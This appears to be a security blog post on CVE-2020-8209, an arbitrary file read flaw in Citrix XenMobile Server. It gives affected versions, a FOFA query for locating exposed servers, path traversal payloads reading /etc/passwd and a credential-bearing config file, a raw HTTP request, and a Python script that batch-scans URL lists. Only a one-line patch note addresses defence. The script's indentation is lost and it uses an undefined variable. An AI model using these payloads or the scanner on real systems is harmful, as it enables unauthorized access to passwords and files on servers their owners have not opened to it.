0x00 Preface
XenMobile is an enterprise mobility management software developed by Citrix. This product allows companies to manage employees’ mobile devices and mobile applications. The purpose of this software is to allow employees to safely work on enterprise-owned and personal mobile devices and applications to improve productivity. CVE-2020-8209, a path traversal vulnerability. This vulnerability allows unauthorized users to read arbitrary files, including configuration files that contain passwords. (The software is mostly abroad, but rarely in China)
The Citrix XenMobile Server 10.12 before RP2, the Citrix XenMobile Server 10.11 before RP4, the Citrix XenMobile Server 10.10 before RP6 and the Citrix XenMobile Server 10.9 before RP5 had improper access control, resulting in the ability to read arbitrary files.
0x01 Affected version
- XenMobile server before RP2 10.12
- XenMobile server before RP4 10.11
- XenMobile server before RP6 10.10
- XenMobile server before 10.9 RP5
0x02 FOFA syntax
app="XenMobile-Console"
0x03 Vulnerability recurrence
POC:
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.propertiesPacket POC:
GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://fofa.so/result?qbase64=YXBwPSJYZW5Nb2JpbGUt5o6n5Yi25Y%2BwIiAmJiBjb3VudHJ5PSJERSI%3D
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
0x04 batch script
#!/usr/bin/env python
# coding:utf-8
import requests,sys,colorama
from colorama import *
init(autoreset=True)
def XenMobile():
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
payload= '/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
poc=urls+payload
try:
requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
response=requests.get(poc,headers=headers,timeout=10,verify=False)
if response.status_code==200 and "root" in response.content:
print(u'\033[1;31;40m[+]{} 存在Citrix XenMobile 目录遍历漏洞'.format(urls))
else:
print('[-]{} None'.format(urls))
except:
print(u'{} 请求超时'.format(urls))
if __name__ == '__main__':
print (banner)
if len(sys.argv)!=2:
print('Example:python CVE-2020-8209-Multiple.py url.txt')
else:
file = open(sys.argv[1])
for url in file.readlines():
urls=url.strip()
XenMobile()
print ('Check Over')0x05 repair suggestion
The official patch deleted /opt/sas/sw/tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jsp
Please indicate: Adminxe's Blog » CVE-2020-8209 (Citrix Endpoint Management) XenMobile-Console has arbitrary file read vulnerability